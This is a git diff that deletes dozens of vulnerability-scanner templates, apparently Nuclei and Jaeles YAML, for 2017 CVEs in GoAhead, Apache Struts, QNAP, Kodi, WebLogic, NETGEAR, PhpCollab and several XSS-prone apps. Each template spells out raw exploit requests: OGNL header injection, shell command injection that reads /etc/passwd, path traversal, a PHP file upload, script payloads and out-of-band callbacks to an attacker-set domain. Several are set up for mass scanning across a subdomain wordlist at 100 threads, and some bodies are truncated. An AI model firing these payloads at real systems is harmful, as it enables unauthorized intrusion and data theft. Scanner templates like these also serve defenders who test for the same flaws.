- - guest/Login
- - home
- - htmlmgr
- - index
- - index/login
- - jscript
- - kvm
- - liveView
- - login
- - login.asp
- - login/login
- - login/login-page
- - login_mgr
- - luci
- - main
- - main-cgi
- - manage/login
- - menu
- - mlogin
- - netbinary
- - nobody/Captcha
- - nobody/VerifyCode
- - normal_userLogin
- - otgw
- - page
- - rulectl
- - service
- - set_new_config
- - sl_webviewer
- - ssi
- - status
- - sysconf
- - systemutil
- - t/out
- - top
- - unauth
- - upload
- - variable
- - wanstatu
- - webcm
- - webmain
- - webproc
- - webscr
- - webviewLogin
- - webviewLogin_m64
- - webviewer
- - welcome
- stop-at-first-match: true
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "environment variable"
- - "display library search paths"
- condition: and
- - type: status
- status:
- - 200
-# Enhanced by mp on 2022/06/19
diff --git a/tmp/cve/cve-2017-17562-2987.yaml b/tmp/cve/cve-2017-17562-2987.yaml
deleted file mode 100644
index 03cb78c6af..0000000000
--- a/tmp/cve/cve-2017-17562-2987.yaml
+++ /dev/null
@@ -1,101 +0,0 @@
-id: CVE-2017-17562
-info:
- name: Embedthis GoAhead RCE
- author: geeknik
- severity: high
- description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.
- reference:
- - https://www.elttam.com/blog/goahead/
- - https://github.com/ivanitlearning/CVE-2017-17562
- - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562
- - https://github.com/embedthis/goahead/issues/249
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 8.1
- cve-id: CVE-2017-17562
- cwe-id: CWE-20
- tags: cve,cve2017,rce,goahead,fuzz
-requests:
- - raw:
- - |
- GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1
- Host: {{Hostname}}
- Accept: */*
- payloads:
- endpoint:
- - admin
- - apply
- - non-CA-rev
- - cgitest
- - checkCookie
- - check_user
- - chn/liveView
- - cht/liveView
- - cnswebserver
- - config
- - configure/set_link_neg
- - configure/swports_adjust
- - eng/liveView
- - firmware
- - getCheckCode
- - get_status
- - getmac
- - getparam
- - guest/Login
- - home
- - htmlmgr
- - index
- - index/login
- - jscript
- - kvm
- - liveView
- - login
- - login.asp
- - login/login
- - login/login-page
- - login_mgr
- - luci
- - main
- - main-cgi
- - manage/login
- - menu
- - mlogin
- - netbinary
- - nobody/Captcha
- - nobody/VerifyCode
- - normal_userLogin
- - otgw
- - page
- - rulectl
- - service
- - set_new_config
- - sl_webviewer
- - ssi
- - status
- - sysconf
- - systemutil
- - t/out
- - top
- - unauth
- - upload
- - variable
- - wanstatu
- - webcm
- - webmain
- - webproc
- - webscr
- - webviewLogin
- - webviewLogin_m64
- - webviewer
- - welcome
- stop-at-first-match: true
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- condition: and
- words:
- - "environment variable"
- - "display library search paths"
diff --git a/tmp/cve/cve-2017-17562-2988.yaml b/tmp/cve/cve-2017-17562-2988.yaml
deleted file mode 100644
index 004b7db17d..0000000000
--- a/tmp/cve/cve-2017-17562-2988.yaml
+++ /dev/null
@@ -1,97 +0,0 @@
-id: cve-2017-17562
-info:
- name: Embedthis GoAhead RCE
- description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.
- author: geeknik
- reference: |
- - https://www.elttam.com/blog/goahead/
- - https://github.com/ivanitlearning/CVE-2017-17562
- - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562
- severity: high
- tags: cve,cve2017,rce,embedthis,goahead,fuzz
-requests:
- - payloads:
- endpoint:
- - admin
- - apply
- - non-CA-rev
- - cgitest
- - checkCookie
- - check_user
- - chn/liveView
- - cht/liveView
- - cnswebserver
- - config
- - configure/set_link_neg
- - configure/swports_adjust
- - eng/liveView
- - firmware
- - getCheckCode
- - get_status
- - getmac
- - getparam
- - guest/Login
- - home
- - htmlmgr
- - index
- - index/login
- - jscript
- - kvm
- - liveView
- - login
- - login.asp
- - login/login
- - login/login-page
- - login_mgr
- - luci
- - main
- - main-cgi
- - manage/login
- - menu
- - mlogin
- - netbinary
- - nobody/Captcha
- - nobody/VerifyCode
- - normal_userLogin
- - otgw
- - page
- - rulectl
- - service
- - set_new_config
- - sl_webviewer
- - ssi
- - status
- - sysconf
- - systemutil
- - t/out
- - top
- - unauth
- - upload
- - variable
- - wanstatu
- - webcm
- - webmain
- - webproc
- - webscr
- - webviewLogin
- - webviewLogin_m64
- - webviewer
- - welcome
- raw:
- - |
- GET /cgi-bin/§endpoint§?LD_DEBUG=help HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
- Accept: */*
- Connection: close
- attack: sniper
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "environment variable"
- - "display library search paths"
- condition: and
diff --git a/tmp/cve/cve-2017-17562.yaml b/tmp/cve/cve-2017-17562.yaml
deleted file mode 100644
index 8f18388518..0000000000
--- a/tmp/cve/cve-2017-17562.yaml
+++ /dev/null
@@ -1,106 +0,0 @@
-id: CVE-2017-17562
-
-info:
- name: Embedthis GoAhead RCE
- description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.
- author: geeknik
- reference:
- - https://www.elttam.com/blog/goahead/
- - https://github.com/ivanitlearning/CVE-2017-17562
- - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562
- severity: high
- tags: cve,cve2017,rce,goahead,fuzz
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 8.10
- cve-id: CVE-2017-17562
- cwe-id: CWE-20
-
-requests:
- - raw:
- - |
- GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1
- Host: {{Hostname}}
- Accept: */*
-
- payloads:
- endpoint:
- - admin
- - apply
- - non-CA-rev
- - cgitest
- - checkCookie
- - check_user
- - chn/liveView
- - cht/liveView
- - cnswebserver
- - config
- - configure/set_link_neg
- - configure/swports_adjust
- - eng/liveView
- - firmware
- - getCheckCode
- - get_status
- - getmac
- - getparam
- - guest/Login
- - home
- - htmlmgr
- - index
- - index/login
- - jscript
- - kvm
- - liveView
- - login
- - login.asp
- - login/login
- - login/login-page
- - login_mgr
- - luci
- - main
- - main-cgi
- - manage/login
- - menu
- - mlogin
- - netbinary
- - nobody/Captcha
- - nobody/VerifyCode
- - normal_userLogin
- - otgw
- - page
- - rulectl
- - service
- - set_new_config
- - sl_webviewer
- - ssi
- - status
- - sysconf
- - systemutil
- - t/out
- - top
- - unauth
- - upload
- - variable
- - wanstatu
- - webcm
- - webmain
- - webproc
- - webscr
- - webviewLogin
- - webviewLogin_m64
- - webviewer
- - welcome
-
- stop-at-first-match: true
- matchers-condition: and
- matchers:
-
- - type: status
- status:
- - 200
-
- - type: word
- condition: and
- words:
- - "environment variable"
- - "display library search paths"
\ No newline at end of file
diff --git a/tmp/cve/cve-2017-18024-2991.yaml b/tmp/cve/cve-2017-18024-2991.yaml
deleted file mode 100644
index b79fcd9beb..0000000000
--- a/tmp/cve/cve-2017-18024-2991.yaml
+++ /dev/null
@@ -1,39 +0,0 @@
-id: CVE-2017-18024
-info:
- name: AvantFAX 3.3.3 XSS
- author: pikpikcu
- severity: medium
- reference:
- - https://hackerone.com/reports/963798
- - http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html
- - https://nvd.nist.gov/vuln/detail/CVE-2017-18024
- description: |
- AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.
- tags: cve,cve2017,xss,avantfax
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
-
- username=admin&password=admin&_submit_check=1&jlbqgb7g0x=1
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ''
- - 'AvantFAX'
- part: body
- condition: and
- - type: status
- status:
- - 200
- - type: word
- part: header
- words:
- - "text/html"
diff --git a/tmp/cve/cve-2017-18536-2994.yaml b/tmp/cve/cve-2017-18536-2994.yaml
deleted file mode 100644
index d0f87964a5..0000000000
--- a/tmp/cve/cve-2017-18536-2994.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2017-18536
-info:
- name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
- reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501
- tags: cve,cve2017,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2017-18638-3001.yaml b/tmp/cve/cve-2017-18638-3001.yaml
deleted file mode 100644
index 7212740754..0000000000
--- a/tmp/cve/cve-2017-18638-3001.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-id: CVE-2017-18638
-info:
- name: Graphite 'graphite.composer.views.send_email' SSRF
- author: huowuzhao
- severity: high
- description: Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.
- reference:
- - http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
- - https://github.com/graphite-project/graphite-web/issues/2008
- - https://github.com/advisories/GHSA-vfj6-275q-4pvm
- - https://nvd.nist.gov/vuln/detail/CVE-2017-18638
- tags: cve,cve2017,graphite,ssrf,oob
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{Host}}.{{Port}}.{{Subdomains}}.2017.18638.{{MY-DOMAIN}} HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
- Accept: */*
diff --git a/tmp/cve/cve-2017-3506-3007.yaml b/tmp/cve/cve-2017-3506-3007.yaml
deleted file mode 100644
index 177ee8f7f4..0000000000
--- a/tmp/cve/cve-2017-3506-3007.yaml
+++ /dev/null
@@ -1,39 +0,0 @@
-id: CVE-2017-3506
-info:
- name: Oracle Weblogic Remote OS Command Execution
- author: pdteam
- description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
- severity: high
- tags: cve,cve2017,weblogic,oracle,rce,oob
- reference: |
- - https://hackerone.com/reports/810778
- - https://nvd.nist.gov/vuln/detail/CVE-2017-3506
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |-
- POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0,
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,
- Content-Type: text/xml;charset=UTF-8
- Content-Length: 873
-
-
-
-
-
-
- http://{{Host}}.{{Port}}.{{Subdomains}}.2017.3506.{{MY-DOMAIN}}
-
-
-
-
-
-
-
-
-
diff --git a/tmp/cve/cve-2017-3528-3010.yaml b/tmp/cve/cve-2017-3528-3010.yaml
deleted file mode 100644
index 1092110dc5..0000000000
--- a/tmp/cve/cve-2017-3528-3010.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2017-3528
-
-info:
- name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect
- author: 0x_Akoko
- severity: low
- reference: |
- - https://blog.zsec.uk/cve-2017-3528/
- - https://www.exploit-db.com/exploits/43592
- tags: oracle,redirect
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET /OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com HTTP/1.1
- Host: {{Subdomains}}
-
- matchers:
- - type: word
- words:
- - 'noresize src="/\example.com?configName='
- part: body
\ No newline at end of file
diff --git a/tmp/cve/cve-2017-4011-3019.yaml b/tmp/cve/cve-2017-4011-3019.yaml
deleted file mode 100644
index b774cf5632..0000000000
--- a/tmp/cve/cve-2017-4011-3019.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2017-4011
-info:
- name: McAfee NDLP User-Agent XSS
- author: geeknik
- severity: medium
- description: McAfee Network Data Loss Prevention (NDLP) 9.3.x allows remote attackers to get session/cookie information via modification of the HTTP request.
- reference:
- - https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab
- - https://kc.mcafee.com/corporate/index?page=content&id=SB10198
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-4011
- tags: cve,cve2017,mcafee,xss
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET / HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"
- - type: word
- part: header
- words:
- - "text/html"
diff --git a/tmp/cve/cve-2017-5521-3026.yaml b/tmp/cve/cve-2017-5521-3026.yaml
deleted file mode 100644
index 11e73ba71c..0000000000
--- a/tmp/cve/cve-2017-5521-3026.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2017-5521
-info:
- name: Bypassing Authentication on NETGEAR Routers
- author: princechaddha
- severity: medium
- description: An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices.They are prone to password disclosure via simple crafted requests to the web management server.
- reference: |
- - https://www.cvedetails.com/cve/CVE-2017-5521/
- - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
- tags: cve,cve2017,auth-bypass
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /passwordrecovered.cgi?id=nuclei HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "right\">Router\\s*Admin\\s*Username<"
- - "right\">Router\\s*Admin\\s*Password<"
- condition: and
- part: body
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2017-5638-3034.yaml b/tmp/cve/cve-2017-5638-3034.yaml
deleted file mode 100644
index 2791f8305f..0000000000
--- a/tmp/cve/cve-2017-5638-3034.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: cve-2017-5638
-info:
- name: Apache Struts 2 RCE
- risk: Critical
-params:
- - root: '{{.BaseURL}}'
-variables:
-requests:
- - method: GET
- url: >-
- {{.root}}
- headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- - Content-Type: "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Jaeles','cvebase')}.multipart/form-data"
- - Pragma: no-cache
- - Accept: 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*'
- detections:
- - >-
- StatusCode() == 200 && StringSearch("resHeaders", "X-Jaeles: cvebase")
-references:
- - https://www.cvebase.com/cve/2017/5638
diff --git a/tmp/cve/cve-2017-5638-3035.yaml b/tmp/cve/cve-2017-5638-3035.yaml
deleted file mode 100644
index ac3a782fbc..0000000000
--- a/tmp/cve/cve-2017-5638-3035.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: CVE-2017-5638
-info:
- author: Random_Robbie
- name: Apache Struts2 RCE
- severity: critical
- description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
- tags: cve,cve2017,struts,rce,apache
- reference: https://github.com/mazen160/struts-pwn
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET / HTTP/1.1
- Host: {{Subdomains}}
- Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
- Accept-Language: en
- Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
- Connection: Keep-Alive
- User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
- Pragma: no-cache
- Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
- matchers:
- - type: word
- words:
- - "X-Hacker: Bounty Plz"
- part: header
diff --git a/tmp/cve/cve-2017-5982-3040.yaml b/tmp/cve/cve-2017-5982-3040.yaml
deleted file mode 100644
index 065267880f..0000000000
--- a/tmp/cve/cve-2017-5982-3040.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: CVE-2017-5982
-info:
- name: Kodi 17.1 Local File Inclusion
- author: 0x_Akoko
- severity: high
- description: Insufficient validation of user input is performed on this URL resulting in a local file inclusion vulnerability.
- reference:
- - https://cxsecurity.com/issue/WLB-2017020164
- - https://www.cvedetails.com/cve/CVE-2017-5982
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cve-id: CVE-2017-5982
- cwe-id: CWE-98
- tags: cve,cve2017,kodi,lfi
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:[x*]:0:0"
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2017-6090-3045.yaml b/tmp/cve/cve-2017-6090-3045.yaml
deleted file mode 100644
index 50a482a1cc..0000000000
--- a/tmp/cve/cve-2017-6090-3045.yaml
+++ /dev/null
@@ -1,37 +0,0 @@
-id: CVE-2017-6090
-info:
- name: PhpCollab (unauthenticated) Arbitrary File Upload
- author: pikpikcu
- severity: critical
- tags: cve,cve2017,phpcollab,rce,fileupload
- reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
-
- -----------------------------154934846911423734231554128137
- Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php"
- Content-Type: application/x-php
-
-
-
- -----------------------------154934846911423734231554128137--
- - |
- GET /logos_clients/1.php HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "48dbd2384cb6b996fa1e2855c7f0567f"
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2017-6360-3047.yaml b/tmp/cve/cve-2017-6360-3047.yaml
deleted file mode 100644
index 9d750a7f35..0000000000
--- a/tmp/cve/cve-2017-6360-3047.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: CVE-2017-6360
-info:
- name: QNAP QTS RCE
- risk: Critical
-params:
- - root: '{{.BaseURL}}'
-variables:
- - endpoint: |
- cgi-bin/userConfig.cgi
-requests:
- - method: GET
- url: >-
- {{.root}}/{{.endpoint}}?func=cloudPersonalSmtp&sid=SIDVALUE&hash=`(echo;id;cat%20/etc/passwd)>%262`
- headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- detections:
- - "StatusCode() == 200 && RegexSearch(\"resBody\", \"root:[x*]:0:0:\") "
-references:
- - https://www.cvebase.com/cve/2017/6360
diff --git a/tmp/cve/cve-2017-6360-3048.yaml b/tmp/cve/cve-2017-6360-3048.yaml
deleted file mode 100644
index eba5efa321..0000000000
--- a/tmp/cve/cve-2017-6360-3048.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: cve-2017-6360
-info:
- name: QNAP QTS RCE
- risk: Critical
-params:
- - root: '{{.BaseURL}}'
-variables:
- - endpoint: |
- cgi-bin/userConfig.cgi
-requests:
- - method: GET
- url: >-
- {{.root}}/{{.endpoint}}?func=cloudPersonalSmtp&sid=SIDVALUE&hash=`(echo;id;cat%20/etc/passwd)>%262`
- headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- detections:
- - "StatusCode() == 200 && RegexSearch(\"resBody\", \"root:[x*]:0:0:\") "
-references:
- - https://www.cvebase.com/cve/2017/6360
diff --git a/tmp/cve/cve-2017-6361-3050.yaml b/tmp/cve/cve-2017-6361-3050.yaml
deleted file mode 100644
index bdc22c30b2..0000000000
--- a/tmp/cve/cve-2017-6361-3050.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: cve-2017-6361
-info:
- name: QNAP QTS RCE
- risk: Critical
-params:
- - root: '{{.BaseURL}}'
-variables:
- - endpoint: |
- cgi-bin/authLogin.cgi
-requests:
- - method: GET
- url: >-
- {{.root}}/{{.endpoint}}?reboot_notice_msg=$(printf "QNAPVJBD%08d%16s 14`(echo;cat%20/etc/passwd)>&2`" $(expr $(date +%s) % 100000000) Disconnect|base64|tr -d "\r\n")
- headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- detections:
- - "StatusCode() == 200 && RegexSearch(\"resBody\", \"root:[x*]:0:0:\") "
-references:
- - https://www.cvebase.com/cve/2017/6360
diff --git a/tmp/cve/cve-2017-6361-3051.yaml b/tmp/cve/cve-2017-6361-3051.yaml
deleted file mode 100644
index edc3b43210..0000000000
--- a/tmp/cve/cve-2017-6361-3051.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: CVE-2017-6361
-info:
- name: QNAP QTS RCE
- risk: Critical
-params:
- - root: '{{.BaseURL}}'
-variables:
- - endpoint: |
- cgi-bin/authLogin.cgi
-requests:
- - method: GET
- url: >-
- {{.root}}/{{.endpoint}}?reboot_notice_msg=$(printf "QNAPVJBD%08d%16s 14`(echo;cat%20/etc/passwd)>&2`" $(expr $(date +%s) % 100000000) Disconnect|base64|tr -d "\r\n")
- headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- detections:
- - "StatusCode() == 200 && RegexSearch(\"resBody\", \"root:[x*]:0:0:\") "
-references:
- - https://www.cvebase.com/cve/2017/6360
diff --git a/tmp/cve/cve-2017-7269-3053.yaml b/tmp/cve/cve-2017-7269-3053.yaml
deleted file mode 100644
index ddb56b4d76..0000000000
--- a/tmp/cve/cve-2017-7269-3053.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
-id: CVE-2017-7269
-info:
- name: Windows Server 2003 & IIS 6.0 RCE
- author: thomas_from_offensity,geeknik
- severity: critical
- description: Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If ", dasl) # lowercase header name: DASL
- - regex("[\d]+(,\s+[\d]+)?", dav) # lowercase header name: DAV
- - regex(".*?PROPFIND", public) # lowercase header name: Public
- - regex(".*?PROPFIND", allow) # lowercase header name: Allow
- condition: or
- part: header
diff --git a/tmp/cve/cve-2017-7269-3055.yaml b/tmp/cve/cve-2017-7269-3055.yaml
deleted file mode 100644
index acaf5beadd..0000000000
--- a/tmp/cve/cve-2017-7269-3055.yaml
+++ /dev/null
@@ -1,40 +0,0 @@
-id: CVE-2017-7269
-info:
- name: Windows Server 2003 & IIS 6.0 - Remote Code Execution
- author: thomas_from_offensity,geeknik
- severity: critical
- description: |
- Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 contains a buffer overflow vulnerability in the ScStoragePathFromUrl function in the WebDAV service that could allow remote attackers to execute arbitrary code via a long header beginning with "If ", dasl) # lowercase header name: DASL
- - regex("[\d]+(,\s+[\d]+)?", dav) # lowercase header name: DAV
- - regex(".*?PROPFIND", public) # lowercase header name: Public
- - regex(".*?PROPFIND", allow) # lowercase header name: Allow
- condition: or
- - type: status
- status:
- - 200
-# Enhanced by mp on 2022/05/11
diff --git a/tmp/cve/cve-2017-7269-3056.yaml b/tmp/cve/cve-2017-7269-3056.yaml
deleted file mode 100644
index cb13ceff1b..0000000000
--- a/tmp/cve/cve-2017-7269-3056.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: cve-2017-7269
-info:
- name: Windows Server 2003 & IIS 6.0 RCE
- author: thomas_from_offensity & @geeknik
- severity: critical
- description: Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If ", dasl) # lowercase header name: DASL
- - regex("[\d]+(,\s+[\d]+)?", dav) # lowercase header name: DAV
- - regex(".*?PROPFIND", public) # lowercase header name: Public
- - regex(".*?PROPFIND", allow) # lowercase header name: Allow
- condition: or
- part: header
diff --git a/tmp/cve/cve-2017-7391-3060.yaml b/tmp/cve/cve-2017-7391-3060.yaml
deleted file mode 100644
index 72367a452c..0000000000
--- a/tmp/cve/cve-2017-7391-3060.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: CVE-2017-7391
-info:
- name: Magmi – Cross-Site Scripting v.0.7.22
- author: pikpikcu
- severity: medium
- description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
- tags: cve,cve2017,magmi,xss
- reference: https://github.com/dweeves/magmi-git/issues/522
- # Download:-https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - '"><'
- part: body
- - type: word
- words:
- - "text/html"
- part: header
diff --git a/tmp/cve/cve-2017-7529-3064.yaml b/tmp/cve/cve-2017-7529-3064.yaml
deleted file mode 100644
index 5f7602520a..0000000000
--- a/tmp/cve/cve-2017-7529-3064.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: cve-2017-7529
-info:
- name: Nginx Remote Integer Overflow
- risk: Medium
-params:
- - root: '{{.BaseURL}}'
-variables:
-requests:
- - method: GET
- url: >-
- {{.root}}/
- headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- - Range: bytes=-17208,-9223372036854758792
- detections:
- - >-
- StatusCode() == 206 && StringSearch("resHeaders", "Server: nginx") && StringSearch("resBody", "Content-Range")
-references:
- - https://www.cvebase.com/cve/2017/7529
diff --git a/tmp/cve/cve-2017-7529-3065.yaml b/tmp/cve/cve-2017-7529-3065.yaml
deleted file mode 100644
index 20c1685e46..0000000000
--- a/tmp/cve/cve-2017-7529-3065.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: CVE-2017-7529
-info:
